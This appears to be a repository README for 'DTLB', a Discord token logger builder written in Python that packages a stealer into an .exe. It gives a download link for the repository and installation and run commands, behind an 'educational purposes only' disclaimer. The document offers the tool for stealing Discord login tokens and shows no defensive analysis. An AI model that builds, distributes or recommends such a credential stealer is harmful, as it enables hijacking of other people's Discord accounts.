DTLB (Discord Token Logger Builder) A program made to log the discord login token.
- This program is made for educational purposes only and to demonstrate how you can create a token logger in python and convert to .exe
- I am not responsible for the misuse that is made of this tool!
First you have to have Python installed.
Before installing it, we will check the Add Python to path box:
Then we will download the .zip of the repository:
https://github.com/Euronymou5/DTLB/archive/refs/heads/main.zip
Then we will install the requirements.txt with the command:
python -m pip install -r requirements.txt
Start:
Double click on the file: main.py
Or
python main.py

